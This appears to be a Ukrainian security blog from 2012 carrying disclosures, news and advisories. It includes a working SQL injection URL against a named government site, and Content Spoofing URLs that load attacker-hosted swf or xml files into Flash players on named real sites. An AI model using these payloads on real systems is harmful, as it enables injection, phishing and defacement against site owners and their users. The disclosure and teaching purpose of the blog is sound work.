Уразливості на www.asv.gov.ua

23:50 02.11.2012

18.07.2012

У липні, 02.07.2012, я дослідив SQL Injection та Cross-Site Scripting уразливості на сайті http://www.asv.gov.ua. Про які мені повідомив AmplenuS, а коли я ці дві дірки перевірив, то знайшов іще одну. Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

02.11.2012

SQL Injection:

http://www.asv.gov.ua/content.php?lang=uk&page=gallery&theme=-1%20or%20version()%3E5

У липні в них була версія MySQL 5.1.63-log, зараз MySQL 5.1.66-log. СУБД оновити не забули, але дірки на сайті як не виправляли, так і не виправляють.

XSS:

Дані уразливості досі не виправлені.

Новини: експлоіт для Windows 8 та IE10, взломи Рейтер та дірявий банк

22:47 02.11.2012

За повідомленням www.xakep.ru, Vupen продає експлоіт для Windows 8 та IE10.

Французька компанія Vupen Security оголосила про успішне створення експлоіта для Windows 8, з’єднавши ланцюжок з багатьох 0day-уразливостей у Windows 8 і браузері Internet Explorer 10.

Звісно, компанія не має наміру повідомляти інформацію про уразливості у Microsoft. Відповідно до бізнесу-моделі Vupen Security, фірма продає 0day-уразливості й експлоіти клієнтам з числа правоохоронних органів, розвідувальних агентств західних країн, переважно, країн НАТО.

Не встигли Windows 8 та IE10 вийти, як їх швидко взломали. Це було цілком прогнозовано.

За повідомленням bugtraq.ru, Рейтер зламали втретє за місяць.

Веселий видався серпень у новинного агентства Рейтер. На протязі одного місяця двічі був взломаний сайт агентства, а також їх мікроблог на Twitter. Я неодноразово писав про сайти, які взламуються регулярно (коли сайти дефейсять або інфікують), але два рази за місяць плюс взлом твіттера - це рекорд :-) .

Під час першого взлому на сайті була розміщена новина про відступ сірійських повстанців, під час другого їхній твіттер був забитий просірійськими повідомленнями, у цей раз на сайті з’явилася стаття про смерть міністра закордонних справ Саудівської Аравії.

За повідомленням www.xakep.ru, банк зберігає номера кредитних карт у cookies.

Деякі банки на подив безвідповідально відносяться до питань інформаційної безпеки. Наприклад, у секюріті розсилці Full-disclosure нещодавно була опублікована інформація про британський банк Santander, що є прикладом повної безладності в питанні захисту користувацьких даних.

На сайті для онлайн-банкінга https://retail.santander.co.uk повно уразливостей, таких як XSS у формі авторизації. Серед інших прикладів - включення приватної інформації про користувачів безпосередньо в cookies.

Про діряві банки та інші e-commerce сайти я пишу регулярно. Подібне несерйозне ставлення банків до безпеки власних сайтів є як в Україні, так і закордоном.

Виявлення похаканих сайтів

20:17 02.11.2012

Після попереднього виявлення похаканих сайтів в моїх логах, приведу нову інформацію про взломані українських сайти. Що використовуються для атак (зокрема RFI атак) на інші сайти.

Похакані сайти в Уанеті:

  • http://librportal.org.ua (невідомим хакером) - 10.2012

Файли, що використовувалися для RFI атак:

http://librportal.org.ua/images/test - файл вже прибраний з сайта.

Переповнення буфера в IBM Informix Dynamic Server

18:25 02.11.2012

Виявлене переповнення буфера в IBM Informix Dynamic Server.

Уразливі версії: IBM Informix Dynamic Server 11.50.

Переповнення буфера в SET COLLATION.

  • IBM Informix Dynamic Server 11.50 SET COLLATION Stack OverFlow (деталі)

Уразливості в плагінах для WordPress №75

23:57 01.11.2012

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Social Discussions, Download Monitor та DM FileManager. Для котрих з’явилися експлоіти. Social Discussions - це плагін для інтеграції сайта з соціальними мережами, Download Monitor - це плагін для ведення статистики скачувань файлів, DM FileManager - це файловий менеджер.

  • Multiple Vulnerabilities in Wordpress Social Discussions Plugin (деталі)
  • Wordpress Download Monitor - Download Page Cross-Site Scripting (деталі)
  • DM FileManager Remote File Inclusion (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Вийшли PHP 5.3.18 та PHP 5.4.8

22:40 01.11.2012

У жовтні, 18.10.2012, вийшли PHP 5.3.18 та PHP 5.4.8. В яких виправлено більше 20 багів. Дані релізи направлені на покращення стабільності гілок 5.3.x і 5.4.x.

Жодних уразливостей в цих версіях PHP виправлено не було.

По матеріалам http://www.php.net.

Підвищення привілеїв в IBM DB2

20:02 01.11.2012

Виявлена можливість підвищення привілеїв в IBM DB2.

Уразливі продукти: IBM DB2 LUW 9.1, DB2 LUW 9.5, DB2 LUW 9.7, DB2 LUW 10.1.

Підвищення привілеїв через збережені процедури GET_WRAP_CFG_C и GET_WRAP_CFG_C2.

  • XML file disclosure vulnerability via GET_WRAP_CFG_C and GET_WRAP_CFG_C2 (деталі)

Добірка уразливостей

18:28 01.11.2012

В даній добірці уразливості в веб додатках:

  • HP AssetManager, Remote Cross Site Scripting (XSS) and Unauthorized Data Modification (деталі)
  • phptax 0.8 <= Remote Code Execution Vulnerability (деталі)
  • XSS Vulnerabilities in phpFreeChat (деталі)
  • Omnistar Mailer v7.2 - Multiple Web Vulnerabilities (деталі)
  • DoS vulnerability in libxslt (деталі)
  • Interspire Email Marketer v6.0.1 - Multiple Vulnerabilites (деталі)
  • Omnistar Document Manager v8.0 - Multiple Vulnerabilities (деталі)
  • vOlk Botnet Framework v4.0 - Multiple Web Vulnerabilities (деталі)
  • Iomega StorCenter/EMC Lifeline Remote Access Vulnerability (деталі)
  • FileBound - Privilege Escalation Vulnerability (деталі)

Content Spoofing атаки: Content Injection та Site Injection

23:55 31.10.2012

Пропоную вам другу статтю на тему Content Spoofing атак, в якій розповім про просунутий Content Spoofing (Advanced Content Spoofing). Якщо в першій статті про Content Spoofing атаки, я навів два простих різновиди CS атак - Link Injection та Text Injection, то зараз я розповім про просунутий CS. Це повна заміна контенту.

Якщо у Link Injection та Text Injection уразливостях відбувалася часткова підміна вмісту, то в у випадку даних уразливостей має місце повна заміна контенту. Просунутий Content Spoofing можна розділити на два різновиди: Content Injection (включення різного медійного контенту) і Site Injection (включення цілого сайта).

Зазначу, що Content Injection атаки можливі як при включенні до html сторінок (якщо веб додаток дозволяє включення зображень чи інших медійних файлів з інших сайтів), так і до флеш файлів. А Site Injection атаки насамперед можливі при включенні до флеш файлів. Всі приклади я наведу стосовно атак на flash додатки.

Content Injection.

Content Injection атаки передбачають включення різного медійного вмісту з зовнішнього сайта. Такого як зображення, відео, аудіо, флеш. Окрім цього можливе включення лінків або тексту. Але якщо у попередніх різновидах CS це був основний напрямок атаки, то у випадку комплексної атаки, включення лінків і тексту - це лише додатковий елемент для більш повного контролю над вмістом. Атака призводить до заміни контенту в рамках окремого елементу сайта (наприклад, флеш відео плеєра).

Хорошим прикладом Content Injection є уразливості у флеш відео плеєрах, про які я писав за останні два роки. Таких плеєрів як FLV Player, flvPlayer, JW Player і JW Player Pro. Зокрема лише одних флешек JW Player, за інформацією Google, в Інтернеті існує близько 7,7 мільйонів.

Підміна вмісту плеєра в FLV Player:

http://site/player_flv.swf?flv=http://attacker/1.flv&startimage=http://attacker/1.jpg

Через всі ці плеєри можна проводити підміну окремих параметрів, так і комплексну атаку для підміни одразу багатьох параметрів. Щоб повністю контролювати вміст флеш відео плеєру. В FLV Player підтримується файл конфігурації в форматах xml і txt, а в flvPlayer, JW Player, JW Player Pro в форматі xml. А також деякі плеєри підтримують файли плейлістів та скіни (FLV Player підтримує jpg-скіни, а обидві версії JW Player підтримують swf-скіни).

Для обох версій JW Player підміна вмісту через файл конфігурації буде виглядати наступним чином:

http://site/jwplayer.swf?config=http://attacker_site/1.xml

Вміст файлу 1.xml:

<config>
  <file>1.flv</file>
  <image>1.jpg</image>
</config>

Site Injection.

Site Injection - це включення цілого сайта в інший сайт. Дана атака призводить до повної заміни контенту сайта (до його повного дефейсу). Вона відбувається через підміну файла конфігурації флешки (в форматі xml), подібно до вищеописаних атак на флеш відео плеєри. В даному випадку відбувається повний контроль не лише над плеєром, а над цілим сайтом (зокрема флеш сайтом).

Можливі два варіанта атаки:

1. Коли можна вказати флешку для включення з зовнішнього сайта (тобто file.swf виступає контейнером, в який завантажується основний вміст флеш-сайта):

http://site/file.swf?content=http://attacker/1.swf

Прикладом такої уразливості є Remote Flash Inclusion на www.banner.kiev.ua знайдена мною 26.04.2009.

2. Коли можна вказати файл конфігурації з зовнішнього сайта:

http://site/file.swf?config=http://attacker/1.xml

Приклад такої уразливості я знайшов 26.01.2011 на сайті ionsky.com.sg. Для атаки потрібно створити xml-файл конфігурації подібний до http://ionsky.com.sg/xml/site.xml.

http://ionsky.com.sg/main.swf?siteXML=http://attacker/1.xml

В файлі конфігурації можна вказати адреси всіх необхідних ресурсів (swf, музика, зображення і текст), що будуть міститися на сайті нападника (деякі ресурси можна взяти навіть з основного сайта). І таким чином повністю підмінити контент сайта.

Дані Content Spoofing уразливості можуть використовуватися для фішинга та інших атак. В деяких випадках можливі XSS атаки.

Уразливість в Apache

22:44 31.10.2012

19.06.2012

У травні, 19.05.2012, я знайшов Information Leakage уразливість в веб сервері Apache. Про що найближчим часом повідомлю розробникам Apache httpd.

Раніше я вже писав про уразливість в Apache.

Детальна інформація про уразливість з’явиться пізніше. Спочатку повідомлю розробникам додатку.

31.10.2012

Information Leakage:

В функціоналі Apache Server Status відбувається витік інформації - зокрема про запити до сервера (до всіх віртуальних хостів на ньому), при включеному ExtendedStatus. Про цей функціонал мені відомо ще з 2001 року, але лише в цьому році я дослідив його з точки зору безпеки.

http://site/server-status/

Також можуть використовуватися параметри notable, auto і refresh.

Цей функціонал знаходиться в модулі mod_status. По замовчуванню він відключений, але випадково чи навмисно (не розуміючи секюриті ризиків) він може бути включений та ще й без обмежень по IP для доступу до статусу. Папка /server-status/ - це шлях по замовчуванню і він може бути змінений в httpd.conf (але в основному використовується саме цей шлях).

Окрім Information Leakage також можлива DoS атака, якщо включена директива ExtendedStatus (доступна починаючи з Apache 1.3.2). Зазначу, що починаючи з версії 2.3.6 включення mod_status призводить до включення ExtendedStatus по замовчуванню. На можливість навантажити сервер при включеному ExtendedStatus звертають увагу і розробники в документації. Це при тому, що Server Status включений (і публічно доступний) на офіційному сервері Apache та ще й з розширеним статусом. Тобто самі вони не стали на це звертати увагу і проігнорували моє звернення про включений і публічно доступний Server Status у них на сервері та необхідність обмежити доступ до нього паролем (для виправлення IL уразливості в mod_status, а також захисту від DoS атак).

http://apache.org/server-status/

Уразливі Apache 1.1 - 2.4.3, що включають mod_status.

Лише в Гуглі (на запит intitle:”Apache Status”) можна знайти біля 5030 проіндексованих сайтів, частина з яких - це сторінки server-status (реальна кількість таких сайтів в Інтернеті значно більша).